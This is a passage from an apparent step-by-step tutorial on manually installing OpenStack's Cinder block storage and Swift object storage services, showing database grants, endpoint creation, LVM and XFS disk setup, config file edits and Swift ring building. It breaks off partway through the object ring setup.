MariaDB [(none)]> CREATE DATABASE cinder;
Query OK, 1 row affected (0.013 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON cinder.* TO 'cinder'@'localhost' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON cinder.* TO 'cinder'@'%' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.001 sec)
</code></pre></div></div>
<p>From there, create a user and add it to the service role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt cinder
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | c3829e1a25074642bd1602bfbf2e5ec3 |
| name | cinder |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user cinder admin
</code></pre></div></div>
<p>Now we can create the service. Note that we are actually going to create two
services, one for Cinder API v2, and one for v3. Not all OpenStack services and
client tools have been updated to fully support newer API versions, and in this
case, we need both versions of the Cinder API to be around.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name cinderv2 --description "OpenStack Block Storage" volumev2
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Block Storage |
| enabled | True |
| id | e78b48b9847b480ab0f24c1a83d33000 |
| name | cinderv2 |
| type | volumev2 |
+-------------+----------------------------------+
$ openstack service create --name cinderv3 --description "OpenStack Block Storage" volumev3
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Block Storage |
| enabled | True |
| id | 898b8bd404df4c45b44cab44ee8dc16a |
| name | cinderv3 |
| type | volumev3 |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Let’s define the two sets of API endpoints:</p>
<p>For v2:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne volumev2 public http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 1d937d8c869c42b2aee7d18362205693 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | e78b48b9847b480ab0f24c1a83d33000 |
| service_name | cinderv2 |
| service_type | volumev2 |
| url | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev2 internal http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 005a0f43cd1e45c3bbc5298fdd3ae7ed |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | e78b48b9847b480ab0f24c1a83d33000 |
| service_name | cinderv2 |
| service_type | volumev2 |
| url | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev2 admin http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 8a048cac157c4bb094bc529b9d8eede3 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | e78b48b9847b480ab0f24c1a83d33000 |
| service_name | cinderv2 |
| service_type | volumev2 |
| url | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
</code></pre></div></div>
<p>For v3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne volumev3 public http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 4d1f8bd850e04220808674a9ad81fd52 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 898b8bd404df4c45b44cab44ee8dc16a |
| service_name | cinderv3 |
| service_type | volumev3 |
| url | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev3 internal http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | ca49e233d0fa4ff7b1554d01afbc68ce |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 898b8bd404df4c45b44cab44ee8dc16a |
| service_name | cinderv3 |
| service_type | volumev3 |
| url | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev3 admin http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 3d5ed2a3b6e347a08f8ec79a98f7e95f |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 898b8bd404df4c45b44cab44ee8dc16a |
| service_name | cinderv3 |
| service_type | volumev3 |
| url | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
</code></pre></div></div>
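<p>Before installing any packages, we can sanity-check the catalog entries we just
created; your IDs and output will differ, but each command should list three
endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint list --service volumev2
$ openstack endpoint list --service volumev3
</code></pre></div></div>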
<h3 id="installing-cinder-to-the-controller">Installing Cinder to the Controller</h3>
<p>Now that the databases and service descriptions have been created, we can go
ahead and install some packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install cinder-api cinder-scheduler
</code></pre></div></div>
<p>Once that is done, we can do some configuration. Let’s add the database creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/cinder/cinder.conf
[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
my_ip = 10.0.0.11
[database]
#connection = sqlite:////var/lib/cinder/cinder.sqlite
connection = mysql+pymysql://cinder:password123@controller/cinder
</code></pre></div></div>
<p>Now we can configure Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = openstack
</code></pre></div></div>
<p>Also configure the lockfile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/cinder/tmp
</code></pre></div></div>
<p>We can then populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "cinder-manage db sync" cinder
</code></pre></div></div>
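<p>If you want to confirm the sync actually created the schema, a quick peek at
the tables works; exact table names vary between releases:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mysql cinder -e "SHOW TABLES;" | head
</code></pre></div></div>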
<p>After that, we need to tell Nova to use Cinder for block storage.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[cinder]
os_region_name = RegionOne
</code></pre></div></div>
<p>From there, we need to restart the Nova and Cinder services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-api
$ sudo systemctl restart cinder-scheduler
$ sudo systemctl restart apache2
</code></pre></div></div>
<h3 id="installing-cinder-to-the-block-storage-machine">Installing Cinder to the Block Storage Machine</h3>
<h4 id="set-up-lvm-for-the-cinder-disk">Set Up LVM For the Cinder Disk</h4>
<p>Time to get Cinder installed to our block storage node. We are going to be using
LVM to manage the storage disk, which requires some setup.</p>
<p>Install some LVM tools:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install lvm2 thin-provisioning-tools
</code></pre></div></div>
<p>From there, we need to determine what device to use. Run <code class="language-plaintext highlighter-rouge">lsblk</code> and we see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ lsblk
vda 252:0 0 10G 0 disk
├─vda1 252:1 0 1M 0 part
└─vda2 252:2 0 10G 0 part /
vdb 252:16 0 10G 0 disk
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">/dev/vda</code> is the disk the operating system is installed on, since it has a 1MB
boot partition and a 10GB root partition. This means <code class="language-plaintext highlighter-rouge">/dev/vdb</code> is the disk we will
prepare for use with Cinder.</p>
<p>We need to create a LVM physical volume and a volume group on the disk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo pvcreate /dev/vdb
Physical volume "/dev/vdb" successfully created.
$ sudo vgcreate cinder-volumes /dev/vdb
Volume group "cinder-volumes" successfully created
</code></pre></div></div>
<p>Now, we also need to edit the LVM configuration file. LVM will automatically scan
block storage devices in <code class="language-plaintext highlighter-rouge">/dev</code> to see if they contain volumes, and this can
cause some trouble when it detects the many volumes Cinder will be making. So,
we will change LVM’s behaviour from exploring all block devices for volumes to
only scanning <code class="language-plaintext highlighter-rouge">/dev/vdb</code>, by adding a filter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/lvm/lvm.conf
devices {
...
filter = [ "a/vdb/", "r/.*/"]
</code></pre></div></div>
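<p>After saving the filter, it’s worth confirming LVM can still see our physical
volume and volume group; if the filter is too strict, these come back empty:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo pvs
$ sudo vgs
</code></pre></div></div>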
<h4 id="install-and-configure-the-cinder-service">Install and Configure the Cinder Service</h4>
<p>Now we can install the Cinder packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install cinder-volume
</code></pre></div></div>
<p>Let’s edit some configuration, and add some DB creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/cinder/cinder.conf
[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
my_ip = 10.0.0.31
enabled_backends = lvm
glance_api_servers = http://controller:9292
[database]
#connection = sqlite:////var/lib/cinder/cinder.sqlite
connection = mysql+pymysql://cinder:password123@controller/cinder
</code></pre></div></div>
<p>Let’s set up Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = openstack
</code></pre></div></div>
<p>We need to configure some LVM settings:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lvm]
volume_driver = cinder.volume.drivers.lvm.LVMVolumeDriver
volume_group = cinder-volumes
target_protocol = iscsi
target_helper = tgtadm
</code></pre></div></div>
<p>This configures Cinder to export block storage volumes to the instances we make
over iSCSI, which is how the disks can live on a different host from the compute
node without being physically connected to the instances.</p>
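<p>Later on, once an instance has a volume attached, you can see the targets tgt is
exporting by running the stock tgt tooling on the block storage node:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo tgtadm --lld iscsi --mode target --op show
</code></pre></div></div>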
<p>And we need to set a lockfile path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/cinder/tmp
</code></pre></div></div>
<p>The last thing we need to do is restart some services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart tgt
$ sudo systemctl restart cinder-volume
</code></pre></div></div>
<h3 id="verifying-that-cinder-was-installed-correctly">Verifying that Cinder was Installed Correctly</h3>
<p>Head back to the controller, source the admin creds, and list all volume services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack volume service list
+------------------+-------------------+------+---------+-------+----------------------------+
| Binary | Host | Zone | Status | State | Updated At |
+------------------+-------------------+------+---------+-------+----------------------------+
| cinder-scheduler | controller | nova | enabled | up | 2020-01-31T02:42:17.000000 |
| cinder-volume | block-storage@lvm | nova | enabled | up | 2020-01-31T02:42:20.000000 |
+------------------+-------------------+------+---------+-------+----------------------------+
</code></pre></div></div>
<p>We see cinder-scheduler running on the controller, and cinder-volume running
on the block storage machine, with both services alive. I think we are done
setting up Cinder.</p>
<h2 id="installing-swift-the-object-storage-service">Installing Swift, the Object Storage Service</h2>
<p>Swift is the object storage service for OpenStack. Swift takes in objects of
any size and replicates them across a storage cluster. Swift uses an eventual
consistency model, as opposed to Ceph, which uses a strong consistency model.
This means an object you get from Swift may or may not be the latest version
of that object.</p>
<p>Swift is fast and robust, and we will be integrating it into this cluster.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/swift/train/install/index.html">Installation Documentation</a>.</p>
<h3 id="creating-users-and-set-up-services-and-endpoints">Creating Users and Set Up Services and Endpoints</h3>
<p>Swift uses sqlite databases on the object storage nodes, so we do not need to
add any database entries on the controller, and we can get right to making users.</p>
<p>SSH into the controller, source the admin creds, and make a swift user.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt swift
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | 4f74761ec0b74087b91eb8431388b174 |
| name | swift |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user swift admin
</code></pre></div></div>
<p>Now we can make the Swift service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name swift \
--description "OpenStack Object Storage" object-store
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Object Storage |
| enabled | True |
| id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| name | swift |
| type | object-store |
+-------------+----------------------------------+
</code></pre></div></div>
<p>And the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne \
> object-store public http://controller:8080/v1/AUTH_%\(project_id\)s
+--------------+-----------------------------------------------+
| Field | Value |
+--------------+-----------------------------------------------+
| enabled | True |
| id | d25b1f10c3f14fc98fd87a8b17fb405d |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift |
| service_type | object-store |
| url | http://controller:8080/v1/AUTH_%(project_id)s |
+--------------+-----------------------------------------------+
$ openstack endpoint create --region RegionOne \
object-store internal http://controller:8080/v1/AUTH_%\(project_id\)s
+--------------+-----------------------------------------------+
| Field | Value |
+--------------+-----------------------------------------------+
| enabled | True |
| id | 4289f12ec58a46669092f3645ca48d26 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift |
| service_type | object-store |
| url | http://controller:8080/v1/AUTH_%(project_id)s |
+--------------+-----------------------------------------------+
$ openstack endpoint create --region RegionOne \
object-store admin http://controller:8080/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 9c6a6d0a1d784da49c53d92f3387285d |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift |
| service_type | object-store |
| url | http://controller:8080/v1 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-swift-to-the-controller">Installing Swift to the Controller</h3>
<p>Let’s install some packages and configure them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install swift swift-proxy python3-swiftclient
</code></pre></div></div>
<p>From there, we will need to manually create some directories and files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mkdir /etc/swift
$ sudo curl -o /etc/swift/proxy-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/proxy-server.conf-sample
</code></pre></div></div>
<p>Time to edit the configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/proxy-server.conf
[DEFAULT]
bind_ip = 10.0.0.11
bind_port = 8080
# keep_idle = 600
# bind_timeout = 30
# backlog = 4096
swift_dir = /etc/swift
user = swift
</code></pre></div></div>
<p>In the <code class="language-plaintext highlighter-rouge">[pipeline:main]</code> section, remove <code class="language-plaintext highlighter-rouge">tempurl</code> and <code class="language-plaintext highlighter-rouge">tempauth</code>, and replace
with <code class="language-plaintext highlighter-rouge">authtoken</code> and <code class="language-plaintext highlighter-rouge">keystoneauth</code> like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[pipeline:main]
pipeline = catch_errors gatekeeper healthcheck proxy-logging cache listing_formats container_sync bulk ratelimit authtoken keystoneauth copy container-quotas account-quotas slo dlo versioned_writes symlink proxy-logging proxy-server
</code></pre></div></div>
<p>Back to it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[app:proxy-server]
use = egg:swift#proxy
account_autocreate = True
[filter:keystoneauth]
use = egg:swift#keystoneauth
operator_roles = admin,user
</code></pre></div></div>
<p>Let’s set up Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[filter:authtoken]
paste.filter_factory = keystonemiddleware.auth_token:filter_factory
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_id = default
user_domain_id = default
project_name = service
username = swift
password = openstack
delay_auth_decision = True
</code></pre></div></div>
<p>Finally, a small config change for memcached:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[filter:cache]
use = egg:swift#memcache
memcache_servers = controller:11211
</code></pre></div></div>
<h3 id="setting-up-disks-on-each-of-the-object-storage-machines">Setting Up Disks on Each of the Object Storage Machines</h3>
<p>The next set of steps needs to be done on both of the object storage nodes.</p>
<p>Install some packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install xfsprogs rsync
</code></pre></div></div>
<p>We now need to determine what drives we have, so run <code class="language-plaintext highlighter-rouge">lsblk</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vda 252:0 0 10G 0 disk
├─vda1 252:1 0 1M 0 part
└─vda2 252:2 0 10G 0 part /
vdb 252:16 0 10G 0 disk
vdc 252:32 0 10G 0 disk
</code></pre></div></div>
<p>We see that <code class="language-plaintext highlighter-rouge">vdb</code> and <code class="language-plaintext highlighter-rouge">vdc</code> are our disks. Let’s format them with XFS:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mkfs.xfs /dev/vdb
$ sudo mkfs.xfs /dev/vdc
</code></pre></div></div>
<p>From there, we will set up persistent mountpoints under <code class="language-plaintext highlighter-rouge">/srv</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mkdir -p /srv/node/vdb
$ sudo mkdir -p /srv/node/vdc
</code></pre></div></div>
<p>Next, edit <code class="language-plaintext highlighter-rouge">fstab</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/fstab
/dev/vdb /srv/node/vdb xfs noatime,nodiratime,logbufs=8 0 2
/dev/vdc /srv/node/vdc xfs noatime,nodiratime,logbufs=8 0 2
</code></pre></div></div>
<p>Mount the drives:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mount /srv/node/vdb
$ sudo mount /srv/node/vdc
</code></pre></div></div>
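<p>Double-check that both filesystems actually mounted where we expect, and show up
as XFS at the expected size:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ df -hT /srv/node/vdb /srv/node/vdc
</code></pre></div></div>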
<p>Time to set up rsync:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo vim /etc/rsyncd.conf
uid = swift
gid = swift
log file = /var/log/rsyncd.log
pid file = /var/run/rsyncd.pid
address = 10.0.0.41
[account]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/account.lock
[container]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/container.lock
[object]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/object.lock
</code></pre></div></div>
<p>Make sure the IP address is correct for the machine you are editing it on.</p>
<p>Enable rsync with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/default/rsync
RSYNC_ENABLE=true
</code></pre></div></div>
<p>Restart rsync with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart rsync
</code></pre></div></div>
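<p>rsync in daemon mode will happily list its modules, which makes for an easy
smoke test. Pointing it at the node you just configured should list the three
sections from <code class="language-plaintext highlighter-rouge">rsyncd.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ rsync rsync://10.0.0.41/
account
container
object
</code></pre></div></div>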
<h3 id="installing-swift-to-the-object-storage-machines">Installing Swift to the Object Storage Machines</h3>
<p>Time to install and configure Swift on our object storage nodes. We need to
do the following on each of our nodes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install swift swift-account swift-container swift-object
</code></pre></div></div>
<p>From there, we need to edit our configuration files, which we first need to
download:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo curl -o /etc/swift/account-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/account-server.conf-sample
$ sudo curl -o /etc/swift/container-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/container-server.conf-sample
$ sudo curl -o /etc/swift/object-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/object-server.conf-sample
</code></pre></div></div>
<p>Let’s edit our config, starting with <code class="language-plaintext highlighter-rouge">account-server.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/account-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6202
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true
[pipeline:main]
pipeline = healthcheck recon account-server
[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
</code></pre></div></div>
<p>Make sure you use the correct IP address for your object storage node.</p>
<p>Onto <code class="language-plaintext highlighter-rouge">container-server.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/container-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6201
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true
[pipeline:main]
pipeline = healthcheck recon container-server
[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
</code></pre></div></div>
<p>Finally, <code class="language-plaintext highlighter-rouge">object-server.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/object-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6200
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true
[pipeline:main]
pipeline = healthcheck recon object-server
[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
recon_lock_path = /var/lock
</code></pre></div></div>
<p>We then need to ensure some directories exist and that the swift user has access
to them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo chown -R swift:swift /srv/node
$ sudo mkdir -p /var/cache/swift
$ sudo chown -R root:swift /var/cache/swift
$ sudo chmod -R 775 /var/cache/swift
</code></pre></div></div>
<h3 id="creating-and-deploying-starting-swift-rings">Creating and Deploying Starting Swift Rings</h3>
<p>Swift has three main parts of its storage architecture, and it was hinted at in
the previous section. Swift has the idea of “rings” to separate concerns within
its architecture. There is the account ring, the container ring and the object
ring.</p>
<p>We need to configure the different rings on the controller, and then take the
configuration generated and give it to all the object storage nodes.</p>
<p>So SSH into the controller, and let’s make some rings:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd /etc/swift
</code></pre></div></div>
<p>The account ring’s initial config sits in the <code class="language-plaintext highlighter-rouge">account.builder</code> file, which we will
create. The three arguments are the partition power (2^10 = 1024 partitions), the
replica count (3), and the minimum number of hours before a partition can be
moved again (1):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder create 10 3 1
</code></pre></div></div>
<p>Then we can add devices to the ring. We need to add both object storage nodes,
and both of their disks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6202 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6202R10.0.0.41:6202/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6202 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6202R10.0.0.41:6202/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6202 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6202R10.0.0.51:6202/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6202 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6202R10.0.0.51:6202/vdc_"" with 100.0 weight got id 3
</code></pre></div></div>
<p>From there, we can examine the ring contents with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder
account.builder, build version 4, id c77e5777355547608a121a2949a175dc
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file account.ring.gz not found, probably it hasn't been written yet
Devices: id region zone ip address:port replication ip:port name weight partitions balance flags meta
0 1 1 10.0.0.41:6202 10.0.0.41:6202 vdb 100.00 0 -100.00
1 1 1 10.0.0.41:6202 10.0.0.41:6202 vdc 100.00 0 -100.00
2 1 1 10.0.0.51:6202 10.0.0.51:6202 vdb 100.00 0 -100.00
3 1 1 10.0.0.51:6202 10.0.0.51:6202 vdc 100.00 0 -100.00
</code></pre></div></div>
<p>We can rebalance the account ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00. Dispersion is now 0.00
</code></pre></div></div>
<p>Next up is the container ring. Let’s make the <code class="language-plaintext highlighter-rouge">container.builder</code> file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder create 10 3 1
</code></pre></div></div>
<p>We can add the devices with the below, taking care to include each node and each
disk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6201 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6201R10.0.0.41:6201/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6201 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6201R10.0.0.41:6201/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6201 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6201R10.0.0.51:6201/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6201 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6201R10.0.0.51:6201/vdc_"" with 100.0 weight got id 3
</code></pre></div></div>
<p>Again, we can view the contents with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder
container.builder, build version 4, id ac293f6e2e2248798e213382f4b9f60e
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file container.ring.gz not found, probably it hasn't been written yet
Devices: id region zone ip address:port replication ip:port name weight partitions balance flags meta
0 1 1 10.0.0.41:6201 10.0.0.41:6201 vdb 100.00 0 -100.00
1 1 1 10.0.0.41:6201 10.0.0.41:6201 vdc 100.00 0 -100.00
2 1 1 10.0.0.51:6201 10.0.0.51:6201 vdb 100.00 0 -100.00
3 1 1 10.0.0.51:6201 10.0.0.51:6201 vdc 100.00 0 -100.00
</code></pre></div></div>
<p>We can rebalance the ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00. Dispersion is now 0.00
</code></pre></div></div>
<p>Next up is the object ring:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder create 10 3 1
</code></pre></div></div>
<p>We can add the nodes to the ring with:</p>
